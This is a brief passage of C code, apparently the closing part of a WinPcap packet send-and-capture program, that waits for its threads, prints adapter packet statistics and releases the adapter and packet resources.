WaitForSingleObject(sthread,INFINITE);
CloseHandle(sthread);
CloseHandle(rthread);
if (PacketGetStats(lpadapter, & stat) == FALSE)
{
printf( " Warning: Unable to get the adapter stat\n " );
}
else
{
printf( " \n\n%d packets received, %d packets lost !\n " ,stat.bs_recv,stat.bs_drop);
}
PacketFreePacket(lppackets);
PacketFreePacket(lppacketr);
PacketCloseAdapter(lpadapter);
return 0 ;
}
